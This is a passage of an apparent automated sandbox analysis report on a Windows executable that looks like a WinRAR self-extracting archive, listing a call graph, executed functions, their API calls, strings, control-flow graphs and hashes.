25589 cab6c2 FindResourceW 25544->25589 25548 cab5c6 4 API calls 25546->25548 25549 cac90d 25548->25549 25550 cac950 25549->25550 25551 cac92c 25549->25551 25553 cab6c2 13 API calls 25549->25553 25561 c9ed62 25550->25561 25605 cab605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25551->25605 25555 cac91d 25553->25555 25554 cac934 25606 cab5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25554->25606 25555->25551 25556 cac923 DeleteObject 25555->25556 25556->25551 25558 cac93d 25607 cab80c 9 API calls 25558->25607 25560 cac944 DeleteObject 25560->25550 25616 c9ed87 25561->25616 25566 caa0c7 25567 cafeae 27 API calls 25566->25567 25568 caa0e6 25567->25568 25568->25391 25570 cabda0 GdiplusShutdown CoUninitialize 25569->25570 25570->25410 25572->25394 25573->25396 25574->25402 25575->25408 25577 c9c669 25576->25577 25578 c9c62d GetVersionExW 25576->25578 25577->25494 25578->25577 25580 caffc0 25579->25580 25581 ca1b41 GetSystemDirectoryW 25580->25581 25582 ca1b59 25581->25582 25583 ca1b77 25581->25583 25584 ca1b6a LoadLibraryW 25582->25584 25583->25494 25584->25583 25585->25488 25587 cb4f9b 25586->25587 25587->25519 25587->25587 25588->25534 25590 cab7d3 25589->25590 25591 cab6e5 SizeofResource 25589->25591 25590->25543 25590->25546 25591->25590 25592 cab6fc LoadResource 25591->25592 25592->25590 25593 cab711 LockResource 25592->25593 25593->25590 25594 cab722 GlobalAlloc 25593->25594 25594->25590 25595 cab73d GlobalLock 25594->25595 25596 cab7cc GlobalFree 25595->25596 25597 cab74c __InternalCxxFrameHandler 25595->25597 25596->25590 25598 cab754 CreateStreamOnHGlobal 25597->25598 25599 cab76c 25598->25599 25600 cab7c5 GlobalUnlock 25598->25600 25608 cab626 GdipAlloc 25599->25608 25600->25596 25603 cab79a GdipCreateHBITMAPFromBitmap 25604 cab7b0 25603->25604 25604->25600 25605->25554 25606->25558 25607->25560 25609 cab638 25608->25609 25610 cab645 25608->25610 25612 cab3b8 25609->25612 25610->25600 25610->25603 25610->25604 25613 cab3d9 GdipCreateBitmapFromStreamICM 25612->25613 25614 cab3e0 GdipCreateBitmapFromStream 25612->25614 25615 cab3e5 25613->25615 25614->25615 25615->25610 25617 c9ed95 __EH_prolog 25616->25617 25618 c9edc4 GetModuleFileNameW 25617->25618 25619 c9edf5 25617->25619 25620 c9edde 25618->25620 25662 c9ab40 25619->25662 25620->25619 25622 c9ee51 25673 cb7720 25622->25673 25623 c9a801 81 API calls 25624 c9ed6e 25623->25624 25660 c9f5be GetModuleHandleW FindResourceW 25624->25660 25626 c9ee25 25626->25622 25628 c9f581 79 API calls 25626->25628 25641 c9f06a 25626->25641 25627 c9ee64 25629 cb7720 26 API calls 25627->25629 25628->25626 25637 c9ee76 ___vcrt_FlsSetValue 25629->25637 25630 c9efa5 25630->25641 25693 c9b000 82 API calls 25630->25693 25632 c9b110 80 API calls 25632->25637 25634 c9efbf ___std_exception_copy 25635 c9ae60 83 API calls 25634->25635 25634->25641 25638 c9efe8 ___std_exception_copy 25635->25638 25637->25630 25637->25632 25637->25641 25687 c9ae60 25637->25687 25692 c9b000 82 API calls 25637->25692 25640 c9eff3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25638->25640 25638->25641 25694 ca2ec2 MultiByteToWideChar 25638->25694 25640->25641 25643 c9f479 25640->25643 25656 ca30e5 WideCharToMultiByte 25640->25656 25695 c9f8d1 50 API calls __vsnprintf 25640->25695 25696 cb7561 26 API calls 3 library calls 25640->25696 25697 cba08e 26 API calls 2 library calls 25640->25697 25698 cb8a08 26 API calls 2 library calls 25640->25698 25699 c9f59c 79 API calls 25640->25699 25641->25623 25652 c9f4fe 25643->25652 25700 cba08e 26 API calls 2 library calls 25643->25700 25645 c9f48e 25701 cb8a08 26 API calls 2 library calls 25645->25701 25647 c9f4e6 25702 c9f59c 79 API calls 25647->25702 25648 c9f534 25649 cb7720 26 API calls 25648->25649 25651 c9f54d 25649->25651 25654 cb7720 26 API calls 25651->25654 25652->25648 25653 c9f581 79 API calls 25652->25653 25653->25652 25654->25641 25656->25640 25661 c9ed75 25660->25661 25661->25566 25663 c9ab4a 25662->25663 25664 c9abab CreateFileW 25663->25664 25665 c9abcc GetLastError 25664->25665 25668 c9ac1b 25664->25668 25666 c9cf32 GetCurrentDirectoryW 25665->25666 25667 c9abec 25666->25667 25667->25668 25670 c9abf0 CreateFileW GetLastError 25667->25670 25669 c9ac5f 25668->25669 25672 c9ac45 SetFileTime 25668->25672 25669->25626 25670->25668 25671 c9ac15 25670->25671 25671->25668 25672->25669 25674 cb7759 25673->25674 25675 cb775d 25674->25675 25686 cb7785 25674->25686 25703 cba7db 20 API calls __dosmaperr 25675->25703 25677 cb7762 25704 cb51a9 26 API calls ___std_exception_copy 25677->25704 25678 cb7aa9 25680 cb0d6c CatchGuardHandler 5 API calls 25678->25680 25682 cb7ab6 25680->25682 25681 cb776d 25683 cb0d6c CatchGuardHandler 5 API calls 25681->25683 25682->25627 25685 cb7779 25683->25685 25685->25627 25686->25678 25705 cb7640 5 API calls CatchGuardHandler 25686->25705 25688 c9ae6c 25687->25688 25690 c9ae73 25687->25690 25688->25637 25690->25688 25691 c9a9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25690->25691 25706 c977bd 78 API calls 25690->25706 25691->25690 25692->25637 25693->25634 25694->25640 25695->25640 25696->25640 25697->25640 25698->25640 25699->25640 25700->25645 25701->25647 25702->25652 25703->25677 25704->25681 25705->25686 25706->25690 25708 cb9093 _abort 25707->25708 25709 cb909a 25708->25709 25710 cb90ac 25708->25710 25743 cb91e1 GetModuleHandleW 25709->25743 25731 cbbde1 EnterCriticalSection 25710->25731 25713 cb909f 25713->25710 25744 cb9225 GetModuleHandleExW 25713->25744 25714 cb9151 25732 cb9191 25714->25732 25718 cb9128 25723 cb9140 25718->25723 25724 cb9e51 _abort 5 API calls 25718->25724 25720 cb90b3 25720->25714 25720->25718 25752 cb9ba0 20 API calls _abort 25720->25752 25721 cb919a 25753 cc3540 5 API calls CatchGuardHandler 25721->25753 25722 cb916e 25735 cb91a0 25722->25735 25725 cb9e51 _abort 5 API calls 25723->25725 25724->25723 25725->25714 25731->25720 25754 cbbe31 LeaveCriticalSection 25732->25754 25734 cb916a 25734->25721 25734->25722 25755 cbc226 25735->25755 25738 cb91ce 25741 cb9225 _abort 8 API calls 25738->25741 25739 cb91ae GetPEB 25739->25738 25740 cb91be GetCurrentProcess TerminateProcess 25739->25740 25740->25738 25742 cb91d6 ExitProcess 25741->25742 25743->25713 25745 cb924f GetProcAddress 25744->25745 25746 cb9272 25744->25746 25749 cb9264 25745->25749 25747 cb9278 FreeLibrary 25746->25747 25748 cb9281 25746->25748 25747->25748 25750 cb0d6c CatchGuardHandler 5 API calls 25748->25750 25749->25746 25751 cb90ab 25750->25751 25751->25710 25752->25718 25754->25734 25756 cbc24b 25755->25756 25760 cbc241 25755->25760 25761 cbbe48 25756->25761 25758 cb0d6c CatchGuardHandler 5 API calls 25759 cb91aa 25758->25759 25759->25738 25759->25739 25760->25758 25762 cbbe78 25761->25762 25765 cbbe74 25761->25765 25762->25760 25763 cbbe98 25763->25762 25766 cbbea4 GetProcAddress 25763->25766 25765->25762 25765->25763 25768 cbbee4 25765->25768 25767 cbbeb4 __dosmaperr 25766->25767 25767->25762 25769 cbbf05 LoadLibraryExW 25768->25769 25773 cbbefa 25768->25773 25770 cbbf3a 25769->25770 25771 cbbf22 GetLastError 25769->25771 25770->25773 25774 cbbf51 FreeLibrary 25770->25774 25771->25770 25772 cbbf2d LoadLibraryExW 25771->25772 25772->25770 25773->25765 25774->25773 26068 c91800 87 API calls Concurrency::cancel_current_task 26069 cab400 GdipDisposeImage GdipFree 26135 cac306 GetDlgItem EnableWindow ShowWindow SendMessageW 25791 cb961a 25802 cbcce0 25791->25802 25796 cb9637 25798 cba65a _free 20 API calls 25796->25798 25799 cb966c 25798->25799 25800 cb9642 25801 cba65a _free 20 API calls 25800->25801 25801->25796 25803 cb962c 25802->25803 25804 cbcce9 25802->25804 25806 cbd0e0 GetEnvironmentStringsW 25803->25806 25819 cbcbd7 25804->25819 25807 cbd0f7 25806->25807 25817 cbd14a 25806->25817 25810 cbd0fd WideCharToMultiByte 25807->25810 25808 cb9631 25808->25796 25818 cb9672 26 API calls 4 library calls 25808->25818 25809 cbd153 FreeEnvironmentStringsW 25809->25808 25811 cbd119 25810->25811 25810->25817 25812 cba7ee __vswprintf_c_l 21 API calls 25811->25812 25813 cbd11f 25812->25813 25814 cbd13c 25813->25814 25815 cbd126 WideCharToMultiByte 25813->25815 25816 cba65a _free 20 API calls 25814->25816 25815->25814 25816->25817 25817->25808 25817->25809 25818->25800 25820 cba505 _abort 38 API calls 25819->25820 25821 cbcbe4 25820->25821 25839 cbccfe 25821->25839 25823 cbcbec 25848 cbc96b 25823->25848 25826 cbcc03 25826->25803 25827 cba7ee __vswprintf_c_l 21 API calls 25828 cbcc14 25827->25828 25829 cbcc46 25828->25829 25855 cbcda0 25828->25855 25832 cba65a _free 20 API calls 25829->25832 25832->25826 25833 cbcc41 25865 cba7db 20 API calls __dosmaperr 25833->25865 25835 cbcc8a 25835->25829 25866 cbc841 26 API calls 25835->25866 25836 cbcc5e 25836->25835 25837 cba65a _free 20 API calls 25836->25837 25837->25835 25840 cbcd0a ___scrt_is_nonwritable_in_current_image 25839->25840 25841 cba505 _abort 38 API calls 25840->25841 25846 cbcd14 25841->25846 25844 cbcd98 _abort 25844->25823 25846->25844 25847 cba65a _free 20 API calls 25846->25847 25867 cba0e4 38 API calls _abort 25846->25867 25868 cbbde1 EnterCriticalSection 25846->25868 25869 cbcd8f LeaveCriticalSection _abort 25846->25869 25847->25846 25849 cb5934 __fassign 38 API calls 25848->25849 25850 cbc97d 25849->25850 25851 cbc99e 25850->25851 25852 cbc98c GetOEMCP 25850->25852 25853 cbc9b5 25851->25853 25854 cbc9a3 GetACP 25851->25854 25852->25853 25853->25826 25853->25827 25854->25853 25856 cbc96b 40 API calls 25855->25856 25857 cbcdbf 25856->25857 25859 cbce10 IsValidCodePage 25857->25859 25862 cbcdc6 25857->25862 25864 cbce35 __cftof 25857->25864 25858 cb0d6c CatchGuardHandler 5 API calls 25860 cbcc39 25858->25860 25861 cbce22 GetCPInfo 25859->25861 25859->25862 25860->25833 25860->25836 25861->25862 25861->25864 25862->25858 25870 cbca43 GetCPInfo 25864->25870 25865->25829 25866->25829 25868->25846 25869->25846 25875 cbca7d 25870->25875 25879 cbcb27 25870->25879 25873 cb0d6c CatchGuardHandler 5 API calls 25874 cbcbd3 25873->25874 25874->25862 25880 cbdb38 25875->25880 25878 cbbd28 __vswprintf_c_l 43 API calls 25878->25879 25879->25873 25881 cb5934 __fassign 38 API calls 25880->25881 25882 cbdb58 MultiByteToWideChar 25881->25882 25884 cbdc2e 25882->25884 25885 cbdb96 25882->25885 25886 cb0d6c CatchGuardHandler 5 API calls 25884->25886 25888 cba7ee __vswprintf_c_l 21 API calls 25885->25888 25891 cbdbb7 __cftof __vsnwprintf_l 25885->25891 25889 cbcade 25886->25889 25887 cbdc28 25899 cbbd73 20 API calls _free 25887->25899 25888->25891 25894 cbbd28 25889->25894 25891->25887 25892 cbdbfc MultiByteToWideChar 25891->25892 25892->25887 25893 cbdc18 GetStringTypeW 25892->25893 25893->25887 25895 cb5934 __fassign 38 API calls 25894->25895 25896 cbbd3b 25895->25896 25900 cbbb0b 25896->25900 25899->25884 25901 cbbb26 __vswprintf_c_l 25900->25901 25902 cbbb4c MultiByteToWideChar 25901->25902 25903 cbbd00 25902->25903 25904 cbbb76 25902->25904 25905 cb0d6c CatchGuardHandler 5 API calls 25903->25905 25907 cba7ee __vswprintf_c_l 21 API calls 25904->25907 25910 cbbb97 __vsnwprintf_l 25904->25910 25906 cbbd13 25905->25906 25906->25878 25907->25910 25908 cbbc4c 25936 cbbd73 20 API calls _free 25908->25936 25909 cbbbe0 MultiByteToWideChar 25909->25908 25911 cbbbf9 25909->25911 25910->25908 25910->25909 25927 cbc11c 25911->25927 25915 cbbc5b 25919 cba7ee __vswprintf_c_l 21 API calls 25915->25919 25922 cbbc7c __vsnwprintf_l 25915->25922 25916 cbbc23 25916->25908 25918 cbc11c __vswprintf_c_l 11 API calls 25916->25918 25917 cbbcf1 25935 cbbd73 20 API calls _free 25917->25935 25918->25908 25919->25922 25920 cbc11c __vswprintf_c_l 11 API calls 25923 cbbcd0 25920->25923 25922->25917 25922->25920 25923->25917 25924 cbbcdf WideCharToMultiByte 25923->25924 25924->25917 25925 cbbd1f 25924->25925 25937 cbbd73 20 API calls _free 25925->25937 25928 cbbe48 __dosmaperr 5 API calls 25927->25928 25929 cbc143 25928->25929 25932 cbc14c 25929->25932 25938 cbc1a4 10 API calls 3 library calls 25929->25938 25931 cbc18c LCMapStringW 25931->25932 25933 cb0d6c CatchGuardHandler 5 API calls 25932->25933 25934 cbbc10 25933->25934 25934->25908 25934->25915 25934->25916 25935->25908 25936->25903 25937->25908 25938->25931 25939 caf31b 14 API calls ___delayLoadHelper2@8 26070 ca741e 138 API calls __InternalCxxFrameHandler 25941 caf41c 25942 caf325 25941->25942 25943 caf9d9 ___delayLoadHelper2@8 14 API calls 25942->25943 25943->25942 26071 cad410 92 API calls _swprintf 25947 cba610 25955 cbbf5f 25947->25955 25951 cba62c 25952 cba639 25951->25952 25963 cba640 11 API calls 25951->25963 25954 cba624 25956 cbbe48 __dosmaperr 5 API calls 25955->25956 25957 cbbf86 25956->25957 25958 cbbf9e TlsAlloc 25957->25958 25959 cbbf8f 25957->25959 25958->25959 25960 cb0d6c CatchGuardHandler 5 API calls 25959->25960 25961 cba61a 25960->25961 25961->25954 25962 cba589 20 API calls 2 library calls 25961->25962 25962->25951 25963->25954 25970 c9ca2e 25971 c9ca40 __cftof 25970->25971 25974 ca23f4 25971->25974 25977 ca23b6 GetCurrentProcess GetProcessAffinityMask 25974->25977 25978 c9ca97 25977->25978 26137 cb0723 20 API calls 26138 cb9320 52 API calls 3 library calls 26072 c91025 29 API calls 26000 c9213d 26001 c92148 26000->26001 26004 c92150 26000->26004 26006 c92162 27 API calls Concurrency::cancel_current_task 26001->26006 26003 c9214e 26004->26003 26005 cafeae 27 API calls 26004->26005 26005->26003 26006->26003 26073 c92430 26 API calls std::bad_exception::bad_exception 26008 caa530 26009 caa555 26008->26009 26010 caa53b 26008->26010 26010->26009 26012 cab181 26010->26012 26013 cab18a 26012->26013 26014 cab198 26012->26014 26013->26014 26016 caa6c1 26013->26016 26014->26009 26017 caa7f6 26016->26017 26018 caa6d0 _wcslen ___std_exception_copy 26016->26018 26017->26014 26018->26017 26027 ca3328 CompareStringW _wcslen 26018->26027 26020 caa749 _wcslen 26021 caa78b GlobalAlloc 26020->26021 26022 caa7c0 26021->26022 26023 caa7a1 WideCharToMultiByte 26021->26023 26024 caa7d4 CreateStreamOnHGlobal 26022->26024 26023->26022 26024->26017 26025 caa7e8 26024->26025 26028 caa59b 26025->26028 26027->26020 26030 caa5c4 26028->26030 26029 caa6b0 26029->26017 26030->26029 26036 caad0e CompareStringW _wcslen ___std_exception_copy 26030->26036 26032 caa67a 26032->26029 26033 caa680 ShowWindow SetWindowTextW 26032->26033 26035 caa6af 26033->26035 26035->26029 26036->26032 26101 cb0530 46 API calls __RTC_Initialize 26140 cb0737 29 API calls _abort 26074 c92037 143 API calls __EH_prolog 26102 ca0534 FreeLibrary

    Executed Functions

    Function 00CAF04C Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 202filesleeptimeCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 00CA1B7C: GetModuleHandleW.KERNEL32(kernel32), ref: 00CA1B95
      • Part of subcall function 00CA1B7C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CA1BA7
      • Part of subcall function 00CA1B7C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CA1BD8
      • Part of subcall function 00CAB64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CAB655
      • Part of subcall function 00CABD0B: OleInitialize.OLE32(00000000), ref: 00CABD24
      • Part of subcall function 00CABD0B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CABD5B
      • Part of subcall function 00CABD0B: SHGetMalloc.SHELL32(00CDA460), ref: 00CABD65
    • GetCommandLineW.KERNEL32 ref: 00CAF08B
    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CAF0B5
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00CAF0C6
    • UnmapViewOfFile.KERNEL32(00000000), ref: 00CAF117
      • Part of subcall function 00CAED1E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00CAED34
      • Part of subcall function 00CAED1E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CAED70
      • Part of subcall function 00CA074B: _wcslen.LIBCMT ref: 00CA076F
    • CloseHandle.KERNEL32(00000000), ref: 00CAF11E
    • GetModuleFileNameW.KERNEL32(00000000,00CF0CC0,00000800), ref: 00CAF138
    • SetEnvironmentVariableW.KERNEL32(sfxname,00CF0CC0), ref: 00CAF144
    • GetLocalTime.KERNEL32(?), ref: 00CAF14F
    • _swprintf.LIBCMT ref: 00CAF18E
    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CAF1A3
    • GetModuleHandleW.KERNEL32(00000000), ref: 00CAF1AA
    • LoadIconW.USER32(00000000,00000064), ref: 00CAF1C1
    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9C0,00000000), ref: 00CAF212
    • Sleep.KERNEL32(?), ref: 00CAF240
    • DeleteObject.GDI32 ref: 00CAF279
    • DeleteObject.GDI32(?), ref: 00CAF289
    • CloseHandle.KERNEL32 ref: 00CAF2CC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
    • API String ID: 3014515783-3710569615
    • Opcode ID: 1fb8ef017e2658ffbbd8d889292e6afc4f8ec70d15961d6cc2ca50a2723c4ddd
    • Instruction ID: 0d184294cebcc5fe668cff85ebcb2f55f3072a9a5a77d35c6a791bf19f320373
    • Opcode Fuzzy Hash: 1fb8ef017e2658ffbbd8d889292e6afc4f8ec70d15961d6cc2ca50a2723c4ddd
    • Instruction Fuzzy Hash: 0A612C71500341ABD710ABB5DC49FBF3BACEB46748F08042EFA45D22A2DB749D44DB62
    Function 00CAB6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 701 cab6c2-cab6df FindResourceW 702 cab7db 701->702 703 cab6e5-cab6f6 SizeofResource 701->703 704 cab7dd-cab7e1 702->704 703->702 705 cab6fc-cab70b LoadResource 703->705 705->702 706 cab711-cab71c LockResource 705->706 706->702 707 cab722-cab737 GlobalAlloc 706->707 708 cab73d-cab746 GlobalLock 707->708 709 cab7d3-cab7d9 707->709 710 cab7cc-cab7cd GlobalFree 708->710 711 cab74c-cab76a call cb2db0 CreateStreamOnHGlobal 708->711 709->704 710->709 714 cab76c-cab78e call cab626 711->714 715 cab7c5-cab7c6 GlobalUnlock 711->715 714->715 720 cab790-cab798 714->720 715->710 721 cab79a-cab7ae GdipCreateHBITMAPFromBitmap 720->721 722 cab7b3-cab7c1 720->722 721->722 723 cab7b0 721->723 722->715 723->722
    APIs
    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CAC91D,00000066), ref: 00CAB6D5
    • SizeofResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB6EC
    • LoadResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB703
    • LockResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB712
    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00CAC91D,00000066), ref: 00CAB72D
    • GlobalLock.KERNEL32(00000000), ref: 00CAB73E
    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CAB762
    • GlobalUnlock.KERNEL32(00000000), ref: 00CAB7C6
      • Part of subcall function 00CAB626: GdipAlloc.GDIPLUS(00000010), ref: 00CAB62C
    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CAB7A7
    • GlobalFree.KERNEL32(00000000), ref: 00CAB7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
    • String ID: PNG
    • API String ID: 211097158-364855578
    • Opcode ID: 3da3f1b17cc9bfba8ee37f8e51d3818b4aa25b327d6e99a71524c2d9e7d5c060
    • Instruction ID: fd2f02a1386fce843c2342a1b194892de188a13c1c74f6cd0df60830ada86955
    • Opcode Fuzzy Hash: 3da3f1b17cc9bfba8ee37f8e51d3818b4aa25b327d6e99a71524c2d9e7d5c060
    • Instruction Fuzzy Hash: 3A31AD71600702AFD7119F21EC98F2F7BA8EF86795B054929F955C2221EB71ED40CBA1
    Function 00C9BA94 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 822 c9ba94-c9bab8 call caffc0 825 c9baba-c9bac7 FindFirstFileW 822->825 826 c9bb20-c9bb29 FindNextFileW 822->826 827 c9bb3b-c9bbf8 call ca1928 call c9d71d call ca2914 * 3 825->827 829 c9bac9-c9badb call c9cf32 825->829 826->827 828 c9bb2b-c9bb39 GetLastError 826->828 833 c9bbfd-c9bc0a 827->833 830 c9bb12-c9bb1b 828->830 837 c9badd-c9baf5 FindFirstFileW 829->837 838 c9baf7-c9bb00 GetLastError 829->838 830->833 837->827 837->838 840 c9bb10 838->840 841 c9bb02-c9bb05 838->841 840->830 841->840 843 c9bb07-c9bb0a 841->843 843->840 845 c9bb0c-c9bb0e 843->845 845->830
    APIs
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BABD
      • Part of subcall function 00C9CF32: _wcslen.LIBCMT ref: 00C9CF56
    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BAEB
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BAF7
    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BB21
    • GetLastError.KERNEL32(?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BB2D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FileFind$ErrorFirstLast$Next_wcslen
    • String ID:
    • API String ID: 42610566-0
    • Opcode ID: 1d1340db3ae845a8c06968258ad4e0715aac99677d7813e54f06861089ded004
    • Instruction ID: d13cec1523b7ac8ca65178356421367e655939d128c75d112e86b2eca981dcf0
    • Opcode Fuzzy Hash: 1d1340db3ae845a8c06968258ad4e0715aac99677d7813e54f06861089ded004
    • Instruction Fuzzy Hash: 27415C72901519ABCB25DF64DC98BEAB3B8FB48350F104196E96DE3240D734AF949F90
    Function 00C992C6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C992CB
      • Part of subcall function 00C9D656: _wcsrchr.LIBVCRUNTIME ref: 00C9D660
      • Part of subcall function 00C9CAA0: _wcslen.LIBCMT ref: 00C9CAA6
      • Part of subcall function 00CA1900: _wcslen.LIBCMT ref: 00CA1906
      • Part of subcall function 00C9B5D6: _wcslen.LIBCMT ref: 00C9B5E2
      • Part of subcall function 00C9B5D6: __aulldiv.LIBCMT ref: 00C9B60E
      • Part of subcall function 00C9B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00C9B615
      • Part of subcall function 00C9B5D6: _swprintf.LIBCMT ref: 00C9B640
      • Part of subcall function 00C9B5D6: _wcslen.LIBCMT ref: 00C9B64A
      • Part of subcall function 00C9B5D6: _swprintf.LIBCMT ref: 00C9B6A0
      • Part of subcall function 00C9B5D6: _wcslen.LIBCMT ref: 00C9B6AA
      • Part of subcall function 00C94727: __EH_prolog.LIBCMT ref: 00C9472C
      • Part of subcall function 00C9A212: __EH_prolog.LIBCMT ref: 00C9A217
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B8FA
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B92B
    Strings
    • __tmp_reference_source_, xrefs: 00C99596
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
    • String ID: __tmp_reference_source_
    • API String ID: 70197177-685763994
    • Opcode ID: 872c6bdef0b982b8539d4cb52c98634374be9ad41e6040df55bb08a4b4d647ac
    • Instruction ID: b575a4bb60dad51e72d7c58c3896af8d4ec9b6d759d5087751f5a431f0a86763
    • Opcode Fuzzy Hash: 872c6bdef0b982b8539d4cb52c98634374be9ad41e6040df55bb08a4b4d647ac
